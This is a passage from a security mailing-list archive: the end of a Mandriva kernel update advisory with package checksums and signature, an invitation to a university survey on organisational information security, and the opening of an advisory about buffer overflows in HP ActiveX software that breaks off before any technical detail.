88932245e268a9bf94bfab17e3ab6fb3 2008.1/x86_64/hsfmodem-kernel-2.6.24.5-desktop-1mnb-7.68.00.07-1mdv2008.1.x86_64.rpm f54ea245685e619305712360f7529a85 2008.1/x86_64/hsfmodem-kernel-2.6.24.5-laptop-1mnb-7.68.00.07-1mdv2008.1.x86_64.rpm 937ed4213d01607a2e8a583c7895243b 2008.1/x86_64/hsfmodem-kernel-2.6.24.5-server-1mnb-7.68.00.07-1mdv2008.1.x86_64.rpm a237ea8f1b0c7fa3ccf6fb7c19dff262 2008.1/x86_64/hsfmodem-kernel-desktop-latest-7.68.00.07-1.20080528.1mdv2008.1.x86_64.rpm 7d47d34327cf674671dcbaa87912cf5b 2008.1/x86_64/hsfmodem-kernel-laptop-latest-7.68.00.07-1.20080528.1mdv2008.1.x86_64.rpm e2f35e2eb824bbe657093f31f0aff656 2008.1/x86_64/hsfmodem-kernel-server-latest-7.68.00.07-1.20080528.1mdv2008.1.x86_64.rpm 82e646382d686dbaa5d9c79ebc98d8e0 2008.1/x86_64/ipw3945-kernel-2.6.24.5-desktop-1mnb-1.2.2-3mdv2008.1.x86_64.rpm 6609d4db1aeefdf5d0fe0e952425c936 2008.1/x86_64/ipw3945-kernel-2.6.24.5-laptop-1mnb-1.2.2-3mdv2008.1.x86_64.rpm 3b6fe56a4c07f96ce033646372ff19c7 2008.1/x86_64/ipw3945-kernel-2.6.24.5-server-1mnb-1.2.2-3mdv2008.1.x86_64.rpm 539b7b27cbda72cd0e25f09d7091c0e9 2008.1/x86_64/ipw3945-kernel-desktop-latest-1.2.2-1.20080528.3mdv2008.1.x86_64.rpm 05c0155bd72c6bdeca1fffc986865b1d 2008.1/x86_64/ipw3945-kernel-laptop-latest-1.2.2-1.20080528.3mdv2008.1.x86_64.rpm 2355c5551a6b4739a65fd00f8798574c 2008.1/x86_64/ipw3945-kernel-server-latest-1.2.2-1.20080528.3mdv2008.1.x86_64.rpm eb47d6946c1fadcf09cf8f3c275894f3 2008.1/x86_64/iwlwifi-kernel-2.6.24.5-desktop-1mnb-1.2.25-5mdv2008.1.x86_64.rpm 913b3ff4fc707cda3bf170ec93d1602b 2008.1/x86_64/iwlwifi-kernel-2.6.24.5-laptop-1mnb-1.2.25-5mdv2008.1.x86_64.rpm d75f3d1df762ac662ffb8d0f39a00b5a 2008.1/x86_64/iwlwifi-kernel-2.6.24.5-server-1mnb-1.2.25-5mdv2008.1.x86_64.rpm 0247e4ec041b1abed3d0759d67d66e51 2008.1/x86_64/iwlwifi-kernel-desktop-latest-1.2.25-1.20080528.5mdv2008.1.x86_64.rpm 4513328a2cb5230cb0d7b22d1ba06546 2008.1/x86_64/iwlwifi-kernel-laptop-latest-1.2.25-1.20080528.5mdv2008.1.x86_64.rpm d6005b549a0d6081ad219a1fa423080a 2008.1/x86_64/iwlwifi-kernel-server-latest-1.2.25-1.20080528.5mdv2008.1.x86_64.rpm 000d500b4491930fb947804f9e914079 2008.1/x86_64/kernel-2.6.24.5-1mnb-1-1mnb1.x86_64.rpm 0c735493d5be10cae0a87192372e28ec 2008.1/x86_64/kernel-desktop-2.6.24.5-1mnb-1-1mnb1.x86_64.rpm fd452de3706d4275898d6968d2b04300 2008.1/x86_64/kernel-desktop-devel-2.6.24.5-1mnb-1-1mnb1.x86_64.rpm abc1c6dad7a599d24d3e7464ed1721c0 2008.1/x86_64/kernel-desktop-devel-latest-2.6.24.5-1mnb1.x86_64.rpm 0e1f18828f106dcfe7e5d8d27562de86 2008.1/x86_64/kernel-desktop-latest-2.6.24.5-1mnb1.x86_64.rpm 3eb258d2253e19e4bef8b03c92afd463 2008.1/x86_64/kernel-doc-2.6.24.5-1mnb1.x86_64.rpm 71695b4ec7433cec46ed6fcbe31052b2 2008.1/x86_64/kernel-laptop-2.6.24.5-1mnb-1-1mnb1.x86_64.rpm 0e582eef4dfd98891d2979e2ea9f2b19 2008.1/x86_64/kernel-laptop-devel-2.6.24.5-1mnb-1-1mnb1.x86_64.rpm 29f6fb79ae21c0fd5406e5bfb2cc4740 2008.1/x86_64/kernel-laptop-devel-latest-2.6.24.5-1mnb1.x86_64.rpm be6f3ce9dc7c2b5aff0ba32387800a3b 2008.1/x86_64/kernel-laptop-latest-2.6.24.5-1mnb1.x86_64.rpm 78ebbfec83d59bc2b92874bcdb1b6fb8 2008.1/x86_64/kernel-server-2.6.24.5-1mnb-1-1mnb1.x86_64.rpm ba3864243fdde5ac029036152e247fd2 2008.1/x86_64/kernel-server-devel-2.6.24.5-1mnb-1-1mnb1.x86_64.rpm 39d0cc2460738cf0e435d2dc5b28fe37 2008.1/x86_64/kernel-server-devel-latest-2.6.24.5-1mnb1.x86_64.rpm cde99850b9e9373d951dac3be2be02ad 2008.1/x86_64/kernel-server-latest-2.6.24.5-1mnb1.x86_64.rpm a775caa4300c7b0b396c5c68edee9fea 2008.1/x86_64/kernel-source-2.6.24.5-1mnb-1-1mnb1.x86_64.rpm bd9dcff9cefefc8c7e79708d6a692b95 2008.1/x86_64/kernel-source-latest-2.6.24.5-1mnb1.x86_64.rpm cfbd237bbf7f97d05f78c03a459e39e2 2008.1/x86_64/kqemu-kernel-2.6.24.5-desktop-1mnb-1.3.0pre11-15.x86_64.rpm 56756e09b8e8de08c0830a857da10f5d 2008.1/x86_64/kqemu-kernel-2.6.24.5-laptop-1mnb-1.3.0pre11-15.x86_64.rpm 174a3f59ec0f099a5f14111cb7704946 2008.1/x86_64/kqemu-kernel-2.6.24.5-server-1mnb-1.3.0pre11-15.x86_64.rpm e76902598fefbe33738e366795c40340 2008.1/x86_64/kqemu-kernel-desktop-latest-1.3.0pre11-1.20080528.15.x86_64.rpm 65837fc576a1d929f7dda308ccce51d8 2008.1/x86_64/kqemu-kernel-laptop-latest-1.3.0pre11-1.20080528.15.x86_64.rpm 55cf6ce580429df766ffb75e4e5d296c 2008.1/x86_64/kqemu-kernel-server-latest-1.3.0pre11-1.20080528.15.x86_64.rpm 10864dea9e540132ba1d1f450f47f27b 2008.1/x86_64/libafs-kernel-2.6.24.5-desktop-1mnb-1.4.6-2mdv2008.1.x86_64.rpm b68cd0f60f8b2d7bc95610450910085c 2008.1/x86_64/libafs-kernel-2.6.24.5-laptop-1mnb-1.4.6-2mdv2008.1.x86_64.rpm 8a7ce424bdee67951da2ca3338eccf39 2008.1/x86_64/libafs-kernel-2.6.24.5-server-1mnb-1.4.6-2mdv2008.1.x86_64.rpm e57c946c48591f3b80cd11a434e98909 2008.1/x86_64/libafs-kernel-desktop-latest-1.4.6-1.20080528.2mdv2008.1.x86_64.rpm 9b7b091852971b015342d48007838236 2008.1/x86_64/libafs-kernel-laptop-latest-1.4.6-1.20080528.2mdv2008.1.x86_64.rpm e6d94e59531fe471537e167fc5b5b011 2008.1/x86_64/libafs-kernel-server-latest-1.4.6-1.20080528.2mdv2008.1.x86_64.rpm fef61ab3981c63c72131a6e941e65eaa 2008.1/x86_64/lirc-kernel-2.6.24.5-desktop-1mnb-0.8.2-1.20080310.2mdv2008.1.x86_64.rpm f32deed70c4afc550bc7c59ca625cfc1 2008.1/x86_64/lirc-kernel-2.6.24.5-laptop-1mnb-0.8.2-1.20080310.2mdv2008.1.x86_64.rpm a790ac8dabfae5a45addab8244462256 2008.1/x86_64/lirc-kernel-2.6.24.5-server-1mnb-0.8.2-1.20080310.2mdv2008.1.x86_64.rpm ec4eacbc71b2ae046b4a5f49dd4d326b 2008.1/x86_64/lirc-kernel-desktop-latest-0.8.2-1.20080528.1.20080310.2mdv2008.1.x86_64.rpm 653c941c1be9b40c3b1d114252aeb94e 2008.1/x86_64/lirc-kernel-laptop-latest-0.8.2-1.20080528.1.20080310.2mdv2008.1.x86_64.rpm 09666e84f08d98a85f1f047e29e6b714 2008.1/x86_64/lirc-kernel-server-latest-0.8.2-1.20080528.1.20080310.2mdv2008.1.x86_64.rpm c511d89c844af53954434e51897a998f 2008.1/x86_64/lzma-kernel-2.6.24.5-desktop-1mnb-4.43-21mdv2008.1.x86_64.rpm 3aa6352c05ea6532c86d30c4eef1c04c 2008.1/x86_64/lzma-kernel-2.6.24.5-laptop-1mnb-4.43-21mdv2008.1.x86_64.rpm baa546a70b3089ee5c90cf0c14421ddb 2008.1/x86_64/lzma-kernel-2.6.24.5-server-1mnb-4.43-21mdv2008.1.x86_64.rpm 03201b0f37f57848f4a351057d189096 2008.1/x86_64/lzma-kernel-desktop-latest-4.43-1.20080528.21mdv2008.1.x86_64.rpm 4f7f89e58f5abc5531ebd5007b9cd563 2008.1/x86_64/lzma-kernel-laptop-latest-4.43-1.20080528.21mdv2008.1.x86_64.rpm e1402361b058f2a95bd6c628ffeab476 2008.1/x86_64/lzma-kernel-server-latest-4.43-1.20080528.21mdv2008.1.x86_64.rpm 787d5c052594ffeafda79b1249c8f150 2008.1/x86_64/m560x-kernel-2.6.24.5-desktop-1mnb-0.4.0-0.20080229.1mdv2008.1.x86_64.rpm 2279426d76143590722eae589d1a7b1e 2008.1/x86_64/m560x-kernel-2.6.24.5-laptop-1mnb-0.4.0-0.20080229.1mdv2008.1.x86_64.rpm 53e1b25d30947e031343c4024d579c09 2008.1/x86_64/m560x-kernel-2.6.24.5-server-1mnb-0.4.0-0.20080229.1mdv2008.1.x86_64.rpm 3b06ad0c681b3f652c2db4bd158961bf 2008.1/x86_64/m560x-kernel-desktop-latest-0.4.0-1.20080528.0.20080229.1mdv2008.1.x86_64.rpm ab2baefffa2dfbe3bfa1e92bf67fdcd7 2008.1/x86_64/m560x-kernel-laptop-latest-0.4.0-1.20080528.0.20080229.1mdv2008.1.x86_64.rpm f18ea9d26bba1d36dd80502fad758942 2008.1/x86_64/m560x-kernel-server-latest-0.4.0-1.20080528.0.20080229.1mdv2008.1.x86_64.rpm cd5c88cc9c133924b2ef644491b9789c 2008.1/x86_64/madwifi-kernel-2.6.24.5-desktop-1mnb-0.9.3.3-5.r3114mdv2008.1.x86_64.rpm 82403fcc9197647c127c99b293670804 2008.1/x86_64/madwifi-kernel-2.6.24.5-laptop-1mnb-0.9.3.3-5.r3114mdv2008.1.x86_64.rpm 2b52e0b3ebec959dac628dfe68e19d83 2008.1/x86_64/madwifi-kernel-2.6.24.5-server-1mnb-0.9.3.3-5.r3114mdv2008.1.x86_64.rpm f6d6e66c921ed9e2dfe65bbdda80ff55 2008.1/x86_64/madwifi-kernel-desktop-latest-0.9.3.3-1.20080528.5.r3114mdv2008.1.x86_64.rpm 66d932a3998a85bb9ae6afdabe4a82dd 2008.1/x86_64/madwifi-kernel-laptop-latest-0.9.3.3-1.20080528.5.r3114mdv2008.1.x86_64.rpm cc974fba3aaec3a6fbe50f9faffe2afc 2008.1/x86_64/madwifi-kernel-server-latest-0.9.3.3-1.20080528.5.r3114mdv2008.1.x86_64.rpm 9dd8cae2f11e9018c1cdf02ca90971b3 2008.1/x86_64/ndiswrapper-kernel-2.6.24.5-desktop-1mnb-1.52-2mdv2008.1.x86_64.rpm c10ecd8706b1463c3e9e0f0543095ffc 2008.1/x86_64/ndiswrapper-kernel-2.6.24.5-laptop-1mnb-1.52-2mdv2008.1.x86_64.rpm dc619c8078243015173755bb0bb88455 2008.1/x86_64/ndiswrapper-kernel-2.6.24.5-server-1mnb-1.52-2mdv2008.1.x86_64.rpm 9527e758657260036962b0ddfe29d0bf 2008.1/x86_64/ndiswrapper-kernel-desktop-latest-1.52-1.20080528.2mdv2008.1.x86_64.rpm 3568f03a03eca0b60e0ebebbc0109226 2008.1/x86_64/ndiswrapper-kernel-laptop-latest-1.52-1.20080528.2mdv2008.1.x86_64.rpm 83779da74f4a5d4e4a52c38ab899a256 2008.1/x86_64/ndiswrapper-kernel-server-latest-1.52-1.20080528.2mdv2008.1.x86_64.rpm 728e58cff9c0d289612545e7441fd56a 2008.1/x86_64/nvidia71xx-kernel-2.6.24.5-desktop-1mnb-71.86.04-4mdv2008.1.x86_64.rpm eb2b6def35e7fa87f63e62d9cb515d53 2008.1/x86_64/nvidia71xx-kernel-2.6.24.5-laptop-1mnb-71.86.04-4mdv2008.1.x86_64.rpm 53845b48ba6afb461aee84b345216c90 2008.1/x86_64/nvidia71xx-kernel-2.6.24.5-server-1mnb-71.86.04-4mdv2008.1.x86_64.rpm dcb3a9343cc5bb3d4617c6bb6c2a97d7 2008.1/x86_64/nvidia71xx-kernel-desktop-latest-71.86.04-1.20080528.4mdv2008.1.x86_64.rpm 41e57833de9510d710b582c9ae613053 2008.1/x86_64/nvidia71xx-kernel-laptop-latest-71.86.04-1.20080528.4mdv2008.1.x86_64.rpm 839c247cbdbcec9de7a0f42095a0b4d7 2008.1/x86_64/nvidia71xx-kernel-server-latest-71.86.04-1.20080528.4mdv2008.1.x86_64.rpm ecd4e83b711dbb5a3368052c314b887e 2008.1/x86_64/nvidia96xx-kernel-2.6.24.5-desktop-1mnb-96.43.05-4mdv2008.1.x86_64.rpm 6127fdf8af9133914f71148bf9fe7208 2008.1/x86_64/nvidia96xx-kernel-2.6.24.5-laptop-1mnb-96.43.05-4mdv2008.1.x86_64.rpm 2fc939b05eb8bd7ecaa48b178d702cee 2008.1/x86_64/nvidia96xx-kernel-2.6.24.5-server-1mnb-96.43.05-4mdv2008.1.x86_64.rpm b8664dfef9e0aa08ee5d904aa0785055 2008.1/x86_64/nvidia96xx-kernel-desktop-latest-96.43.05-1.20080528.4mdv2008.1.x86_64.rpm 5eee1e3200d5d787b18ec62f0d83685f 2008.1/x86_64/nvidia96xx-kernel-laptop-latest-96.43.05-1.20080528.4mdv2008.1.x86_64.rpm 8a828fa26a43db7b94c5affa9e18b207 2008.1/x86_64/nvidia96xx-kernel-server-latest-96.43.05-1.20080528.4mdv2008.1.x86_64.rpm 1979ee3014c03726c71e2ebe8bd072d4 2008.1/x86_64/nvidia-current-kernel-2.6.24.5-desktop-1mnb-169.12-4mdv2008.1.x86_64.rpm 87b10d99b7410a6d04eea331d48d2d88 2008.1/x86_64/nvidia-current-kernel-2.6.24.5-laptop-1mnb-169.12-4mdv2008.1.x86_64.rpm 80d60ab766eafe84c94f6197775eb49a 2008.1/x86_64/nvidia-current-kernel-2.6.24.5-server-1mnb-169.12-4mdv2008.1.x86_64.rpm 1c36664d4841f06fc3e6b8a09b37cc72 2008.1/x86_64/nvidia-current-kernel-desktop-latest-169.12-1.20080528.4mdv2008.1.x86_64.rpm 0b961dcbb9ea168d5fe3e8cb7460d3e1 2008.1/x86_64/nvidia-current-kernel-laptop-latest-169.12-1.20080528.4mdv2008.1.x86_64.rpm dc788b48d9d702e3dd44cf34e62ff395 2008.1/x86_64/nvidia-current-kernel-server-latest-169.12-1.20080528.4mdv2008.1.x86_64.rpm d9584524e0df901c3c6b4134dc1c6029 2008.1/x86_64/omfs-kernel-2.6.24.5-desktop-1mnb-0.7.6-1mdv2008.1.x86_64.rpm 18e157cd7e67d4b76e315ba1c40571b2 2008.1/x86_64/omfs-kernel-2.6.24.5-laptop-1mnb-0.7.6-1mdv2008.1.x86_64.rpm 14b8e2f7f2303fbf1f5ece71007e7294 2008.1/x86_64/omfs-kernel-2.6.24.5-server-1mnb-0.7.6-1mdv2008.1.x86_64.rpm a06be98b0ad95f496ffc5817bb134b7e 2008.1/x86_64/omfs-kernel-desktop-latest-0.7.6-1.20080528.1mdv2008.1.x86_64.rpm 088b1d0fcd9ec629a5af4d7fee479503 2008.1/x86_64/omfs-kernel-laptop-latest-0.7.6-1.20080528.1mdv2008.1.x86_64.rpm ce08f046848a0e084475beb1b846236a 2008.1/x86_64/omfs-kernel-server-latest-0.7.6-1.20080528.1mdv2008.1.x86_64.rpm c4f9b7630abe626a29231afc7cadd52b 2008.1/x86_64/opencbm-kernel-2.6.24.5-desktop-1mnb-0.4.2a-1mdv2008.1.x86_64.rpm 70da639bb7b94e7a6d82315701e0984e 2008.1/x86_64/opencbm-kernel-2.6.24.5-laptop-1mnb-0.4.2a-1mdv2008.1.x86_64.rpm 21af4ba2ab3c7fb19ce58425f261fd78 2008.1/x86_64/opencbm-kernel-2.6.24.5-server-1mnb-0.4.2a-1mdv2008.1.x86_64.rpm e03d06f6428e97d9a620f891fbd18e3d 2008.1/x86_64/opencbm-kernel-desktop-latest-0.4.2a-1.20080528.1mdv2008.1.x86_64.rpm 204f95e871ea8b71cb839b928ba1bb3b 2008.1/x86_64/opencbm-kernel-laptop-latest-0.4.2a-1.20080528.1mdv2008.1.x86_64.rpm cf287a91c8b3f801d133eccbbbc40cf9 2008.1/x86_64/opencbm-kernel-server-latest-0.4.2a-1.20080528.1mdv2008.1.x86_64.rpm 6cf2d1dc787e851e15f0a1264934e5f8 2008.1/x86_64/ov51x-jpeg-kernel-2.6.24.5-desktop-1mnb-1.5.6-1mdv2008.1.x86_64.rpm c8e93129cbf774efb341aeda1c2214a8 2008.1/x86_64/ov51x-jpeg-kernel-2.6.24.5-laptop-1mnb-1.5.6-1mdv2008.1.x86_64.rpm 3a6912fb4f6b8d009be168568c443a27 2008.1/x86_64/ov51x-jpeg-kernel-2.6.24.5-server-1mnb-1.5.6-1mdv2008.1.x86_64.rpm 968f9a5693d6d393031026d95e3fa356 2008.1/x86_64/ov51x-jpeg-kernel-desktop-latest-1.5.6-1.20080528.1mdv2008.1.x86_64.rpm b944a469df68315a0d92492c1d84ea75 2008.1/x86_64/ov51x-jpeg-kernel-laptop-latest-1.5.6-1.20080528.1mdv2008.1.x86_64.rpm a82d6283e0533804196db82bf8ce64f2 2008.1/x86_64/ov51x-jpeg-kernel-server-latest-1.5.6-1.20080528.1mdv2008.1.x86_64.rpm c64beb454fea2be614f06eb7b92beb72 2008.1/x86_64/qc-usb-messenger-kernel-2.6.24.5-desktop-1mnb-1.7-1mdv2008.1.x86_64.rpm f68e3650f5edb39b35ab88728a43a531 2008.1/x86_64/qc-usb-messenger-kernel-2.6.24.5-laptop-1mnb-1.7-1mdv2008.1.x86_64.rpm 7aace287c4c671a7a87d7aa86b896469 2008.1/x86_64/qc-usb-messenger-kernel-2.6.24.5-server-1mnb-1.7-1mdv2008.1.x86_64.rpm c02205523b4250d22f4555957e16e287 2008.1/x86_64/qc-usb-messenger-kernel-desktop-latest-1.7-1.20080528.1mdv2008.1.x86_64.rpm 7ab58c5a282370755f9c61f8656635b1 2008.1/x86_64/qc-usb-messenger-kernel-laptop-latest-1.7-1.20080528.1mdv2008.1.x86_64.rpm 9429787623c42d9249ea45d1e3408ee3 2008.1/x86_64/qc-usb-messenger-kernel-server-latest-1.7-1.20080528.1mdv2008.1.x86_64.rpm f88149b6ba40c6eeb2b04e6530e37421 2008.1/x86_64/r5u870-kernel-2.6.24.5-desktop-1mnb-0.11.0-3mdv2008.1.x86_64.rpm caaa836e549263cf312863cdba619c4a 2008.1/x86_64/r5u870-kernel-2.6.24.5-laptop-1mnb-0.11.0-3mdv2008.1.x86_64.rpm 4d9a027156e2d84ec1ef1825e29ffc69 2008.1/x86_64/r5u870-kernel-2.6.24.5-server-1mnb-0.11.0-3mdv2008.1.x86_64.rpm 9aa3c9c2086d922d223f0438aafe6550 2008.1/x86_64/r5u870-kernel-desktop-latest-0.11.0-1.20080528.3mdv2008.1.x86_64.rpm 5c6f928ab3169b8d3c8e2c9353e7c6e9 2008.1/x86_64/r5u870-kernel-laptop-latest-0.11.0-1.20080528.3mdv2008.1.x86_64.rpm 3931ca0d7b330a7427f243738c94cdc4 2008.1/x86_64/r5u870-kernel-server-latest-0.11.0-1.20080528.3mdv2008.1.x86_64.rpm 819757b3edf8e644b732c1095ba7d9cd 2008.1/x86_64/realcrypt-kernel-2.6.24.5-desktop-1mnb-4.3-1mdv2008.1.x86_64.rpm 873908ea430d083698c38291529cdbce 2008.1/x86_64/realcrypt-kernel-2.6.24.5-laptop-1mnb-4.3-1mdv2008.1.x86_64.rpm a6849f64517b1f3b482dad99470e4e6f 2008.1/x86_64/realcrypt-kernel-2.6.24.5-server-1mnb-4.3-1mdv2008.1.x86_64.rpm 0a2d3dc25b9c420cd752a5c44750e348 2008.1/x86_64/realcrypt-kernel-desktop-latest-4.3-1.20080528.1mdv2008.1.x86_64.rpm ae254d9acbf4e0132e1b4e5f7cdcc895 2008.1/x86_64/realcrypt-kernel-laptop-latest-4.3-1.20080528.1mdv2008.1.x86_64.rpm c20ff589ffe3357a12e07853a48ffc15 2008.1/x86_64/realcrypt-kernel-server-latest-4.3-1.20080528.1mdv2008.1.x86_64.rpm 1ae6c00bccaab8ef66d6439b90907a72 2008.1/x86_64/squashfs-kernel-2.6.24.5-desktop-1mnb-3.3-2mdv2008.1.x86_64.rpm f9908446cfe7faefcec27fdbd3c4e91b 2008.1/x86_64/squashfs-kernel-2.6.24.5-laptop-1mnb-3.3-2mdv2008.1.x86_64.rpm f5bd8139dd6ab57123d4ce327c6ed663 2008.1/x86_64/squashfs-kernel-2.6.24.5-server-1mnb-3.3-2mdv2008.1.x86_64.rpm c7627e97be1b682ae202592c6fc2daaa 2008.1/x86_64/squashfs-kernel-desktop-latest-3.3-1.20080528.2mdv2008.1.x86_64.rpm 31ee32b801a8dd7f89ed71bfc37c91fa 2008.1/x86_64/squashfs-kernel-laptop-latest-3.3-1.20080528.2mdv2008.1.x86_64.rpm b476164462cbc1cd4753d49b583fa903 2008.1/x86_64/squashfs-kernel-server-latest-3.3-1.20080528.2mdv2008.1.x86_64.rpm aaba6002feb1260d4d58fe4b10f1ef7a 2008.1/x86_64/squashfs-lzma-kernel-2.6.24.5-desktop-1mnb-3.3-1mdv2008.1.x86_64.rpm 91ef82b9e8c83780ea95126611f4368c 2008.1/x86_64/squashfs-lzma-kernel-2.6.24.5-laptop-1mnb-3.3-1mdv2008.1.x86_64.rpm 01aee83abeb0cf5b784435bad5849976 2008.1/x86_64/squashfs-lzma-kernel-2.6.24.5-server-1mnb-3.3-1mdv2008.1.x86_64.rpm d9be78c9a7bedcdc68cfc61a80c5765f 2008.1/x86_64/squashfs-lzma-kernel-desktop-latest-3.3-1.20080528.1mdv2008.1.x86_64.rpm 9e7ba570e19d827ea7da248606bdbcab 2008.1/x86_64/squashfs-lzma-kernel-laptop-latest-3.3-1.20080528.1mdv2008.1.x86_64.rpm 4d714d0cf352d00a9ba595306f92a181 2008.1/x86_64/squashfs-lzma-kernel-server-latest-3.3-1.20080528.1mdv2008.1.x86_64.rpm 046e941166e56c037ec43f2c15730c33 2008.1/x86_64/syntek-kernel-2.6.24.5-desktop-1mnb-1.3.1-1mdv2008.1.x86_64.rpm f03b7cacb274cf9ca7ddbb1300099460 2008.1/x86_64/syntek-kernel-2.6.24.5-laptop-1mnb-1.3.1-1mdv2008.1.x86_64.rpm d7d0e9306186cf2740756bbfc04a7e69 2008.1/x86_64/syntek-kernel-2.6.24.5-server-1mnb-1.3.1-1mdv2008.1.x86_64.rpm 3ff459cd25eae23dd304ef82dd59e0ab 2008.1/x86_64/syntek-kernel-desktop-latest-1.3.1-1.20080528.1mdv2008.1.x86_64.rpm 4616d93e934fe41d350c2a74f0dec4b9 2008.1/x86_64/syntek-kernel-laptop-latest-1.3.1-1.20080528.1mdv2008.1.x86_64.rpm 71d64ffd01a15b5cd0a8c0fd9f136ee1 2008.1/x86_64/syntek-kernel-server-latest-1.3.1-1.20080528.1mdv2008.1.x86_64.rpm ccc67be8c994908c945edccf014d50e2 2008.1/x86_64/tp_smapi-kernel-2.6.24.5-desktop-1mnb-0.36-1mdv2008.1.x86_64.rpm e4b23079b741303fb2570780051257b3 2008.1/x86_64/tp_smapi-kernel-2.6.24.5-laptop-1mnb-0.36-1mdv2008.1.x86_64.rpm 7bf78cc33e9424b0e6d6b714569f0d45 2008.1/x86_64/tp_smapi-kernel-2.6.24.5-server-1mnb-0.36-1mdv2008.1.x86_64.rpm d11b9760a7744b7083d7acfde397ee2e 2008.1/x86_64/tp_smapi-kernel-desktop-latest-0.36-1.20080528.1mdv2008.1.x86_64.rpm 449c024c4f8cb3caaee34f633b3c8716 2008.1/x86_64/tp_smapi-kernel-laptop-latest-0.36-1.20080528.1mdv2008.1.x86_64.rpm 0afe2993b3c3d368941d5b1f04151562 2008.1/x86_64/tp_smapi-kernel-server-latest-0.36-1.20080528.1mdv2008.1.x86_64.rpm d63dc1afacb06263d695be25585bd033 2008.1/x86_64/unionfs-kernel-2.6.24.5-desktop-1mnb-1.4.1mdv2008.1-1mdv2008.1.x86_64.rpm 3f88a5f8b70178ccc7e0f83a469e32e6 2008.1/x86_64/unionfs-kernel-2.6.24.5-laptop-1mnb-1.4.1mdv2008.1-1mdv2008.1.x86_64.rpm d5821c845d02c373c0db5737fc84c53f 2008.1/x86_64/unionfs-kernel-2.6.24.5-server-1mnb-1.4.1mdv2008.1-1mdv2008.1.x86_64.rpm 962b374b3ec9359f06167d3313467977 2008.1/x86_64/unionfs-kernel-desktop-latest-1.4.1mdv2008.1-1.20080528.1mdv2008.1.x86_64.rpm 44284ba3685ba4d5eae43da368c7325f 2008.1/x86_64/unionfs-kernel-laptop-latest-1.4.1mdv2008.1-1.20080528.1mdv2008.1.x86_64.rpm 7281f3d2d79cd83ccf79ba00fb245707 2008.1/x86_64/unionfs-kernel-server-latest-1.4.1mdv2008.1-1.20080528.1mdv2008.1.x86_64.rpm 5e5200d4c6c27ee89586c52b151e7ed0 2008.1/x86_64/virtualbox-kernel-2.6.24.5-desktop-1mnb-1.5.6-1mdv2008.1.x86_64.rpm a77217bd2b5d0073e61259db2d8dc0df 2008.1/x86_64/virtualbox-kernel-2.6.24.5-laptop-1mnb-1.5.6-1mdv2008.1.x86_64.rpm 2e6006de333fbec555d2f5de505a94cf 2008.1/x86_64/virtualbox-kernel-2.6.24.5-server-1mnb-1.5.6-1mdv2008.1.x86_64.rpm fbf322c6af81ae9e316a80d920445f24 2008.1/x86_64/virtualbox-kernel-desktop-latest-1.5.6-1.20080528.1mdv2008.1.x86_64.rpm 62806cae4a266186f4285f763d022767 2008.1/x86_64/virtualbox-kernel-laptop-latest-1.5.6-1.20080528.1mdv2008.1.x86_64.rpm e71c304cbc36d5a8ee71f7f8522b6a00 2008.1/x86_64/virtualbox-kernel-server-latest-1.5.6-1.20080528.1mdv2008.1.x86_64.rpm 80de00f5cab580cb51b4507794435bad 2008.1/x86_64/vpnclient-kernel-2.6.24.5-desktop-1mnb-4.8.01.0640-1mdv2008.1.x86_64.rpm 93452c814bddc96e0a3fcc689fc1134e 2008.1/x86_64/vpnclient-kernel-2.6.24.5-laptop-1mnb-4.8.01.0640-1mdv2008.1.x86_64.rpm 6b1a8c91c939452284b7f39d3fd00375 2008.1/x86_64/vpnclient-kernel-2.6.24.5-server-1mnb-4.8.01.0640-1mdv2008.1.x86_64.rpm 94e195805f81582ec62334a166ac4cbb 2008.1/x86_64/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20080528.1mdv2008.1.x86_64.rpm 0aacb735b57c1024efd1893d4ef71f0c 2008.1/x86_64/vpnclient-kernel-laptop-latest-4.8.01.0640-1.20080528.1mdv2008.1.x86_64.rpm 8e273c70a79a844e6a42452a1a2fb219 2008.1/x86_64/vpnclient-kernel-server-latest-4.8.01.0640-1.20080528.1mdv2008.1.x86_64.rpm ea7f869490f154505c777e4e09633695 2008.1/SRPMS/kernel-2.6.24.5-1mnb1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIRYJxmqjQ0CJFipgRArsyAJ9VXYkocwQMUBIDfZ1BaVbocHzm2wCgvU7F qvdeKMUBdQlxNYwEZ0jAqMY= =8off -----END PGP SIGNATURE----- From anas at tawileh.net Wed Jun 4 00:08:08 2008 From: anas at tawileh.net (Anas TAWILEH) Date: Wed, 4 Jun 2008 00:08:08 +0100 Subject: [Full-disclosure] Invitation to a Research Survey on Information Security in Organisations Message-ID: <20080603234901.A7A46EF@lists.grok.org.uk> Dear friend, You are invited to participate in an academic study about the status of Information Security in organisations. The survey is conducted by the Information Assurance Research Team at Cardiff University. Your contributions will have significant value to this research project which aims to construct a holistic picture of organisational information security practices. The survey should not take more than 10 minutes of your time. CLICK HERE TO BEGIN THE SURVEY Or alternatively, copy and paste this entire link into your Internet browser: http://www.surveymonkey.com/s.aspx?sm=EwrpO5Xfn6kJ4AfGI8n13g_3d_3d The survey is conducted online with tools in place to ensure that your answers are completely anonymous. Your identity will not be disclosed to anyone, including the researchers. After you have completed the survey, we strongly encourage you to forward this survey to your friends, colleagues, and acquaintances that may also would like to contribute to this project. Please feel free to contact the researchers with any questions or concerns you may have regarding this survey on the following email address: m.a.tawileh at cs.cf.ac.uk -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080604/acf2c017/attachment.html From rand at csis.dk Wed Jun 4 11:20:17 2008 From: rand at csis.dk (Dennis Rand) Date: Wed, 4 Jun 2008 12:20:17 +0200 Subject: [Full-disclosure] CSIS-RI-0003: Multiple buffer overflow vulnerabilities in HP ActiveX Message-ID: Multiple buffer overflow vulnerabilities in HP Software Hewlett-Packard (HP) is the world's largest PC dealer. According to IDC, HP shipped 14.7 million units worldwide, a 23.3 percent year-over-year growth and a 19 percent market share. PC's and laptops from HP are often shipped with preinstalled software running on Microsoft Windows. The software is designed so the end-user can keep drivers and HP software automatically updated. This is done through a ActiveX plugin for Microsoft Internet Explorer. CSIS have discovered multiple high-risk 